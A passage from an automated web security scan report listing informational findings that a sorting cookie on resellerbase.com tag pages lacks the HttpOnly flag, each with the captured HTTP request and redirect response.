Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:53:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/domain+names
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.71. http://www.resellerbase.com/tag/domains previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/domains

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/domains HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domains
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:57:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/domains
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.72. http://www.resellerbase.com/tag/dropshipper previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/dropshipper

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/dropshipper HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dropshipper
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:53:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/dropshipper
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.73. http://www.resellerbase.com/tag/eBook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/eBook

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/eBook HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/eBook
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:53:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/eBook
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.74. http://www.resellerbase.com/tag/flights previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/flights

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/flights HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/flights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:55:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/flights
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.75. http://www.resellerbase.com/tag/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/googlepr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/googlepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:59:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/googlepr.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.76. http://www.resellerbase.com/tag/host previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/host

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/host HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/host
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/host
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.77. http://www.resellerbase.com/tag/hosting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/hosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/hosting HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hosting
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/hosting
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.78. http://www.resellerbase.com/tag/hotel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/hotel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/hotel HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/hotel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/hotel
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.79. http://www.resellerbase.com/tag/internet+access previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/internet+access

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/internet+access HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/internet+access
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/internet+access
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.80. http://www.resellerbase.com/tag/master+resell+rights previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/master+resell+rights

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/master+resell+rights HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/master+resell+rights
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:53:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/master+resell+rights
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.81. http://www.resellerbase.com/tag/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/mobile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/mobile HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/mobile
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:55:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/mobile
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.82. http://www.resellerbase.com/tag/personals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/personals

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/personals HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/personals
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/personals
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.83. http://www.resellerbase.com/tag/phone previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/phone

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/phone HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/phone
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/phone
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.84. http://www.resellerbase.com/tag/private+label previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/private+label

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/private+label HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/private+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/private+label
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.85. http://www.resellerbase.com/tag/resel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/resel HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/resel
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.86. http://www.resellerbase.com/tag/resell previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resell

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/resell HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resell
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/resell
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.87. http://www.resellerbase.com/tag/reseller+programs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller+programs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/reseller+programs HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+programs
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/reseller+programs
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.88. http://www.resellerbase.com/tag/reseller+rights previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reseller+rights

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/reseller+rights HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reseller+rights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/reseller+rights
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.89. http://www.resellerbase.com/tag/resellers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/resellers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/resellers HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resellers
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/resellers
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.90. http://www.resellerbase.com/tag/reselling previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/reselling

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/reselling HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/reselling
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:58:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/reselling
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.91. http://www.resellerbase.com/tag/ringtones previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/ringtones

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/ringtones HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/ringtones
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:55:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/ringtones
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.92. http://www.resellerbase.com/tag/script previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/script

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/script HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/script
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/script
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.93. http://www.resellerbase.com/tag/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:59:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/search.php?keyword=search...&Submit3=Search&opt=2
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.94. http://www.resellerbase.com/tag/sex previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/sex

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/sex HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/sex
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/sex
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html

4.95. http://www.resellerbase.com/tag/singels previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/singels

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

COOKIE_SORT_BY=title; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/singels HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/singels
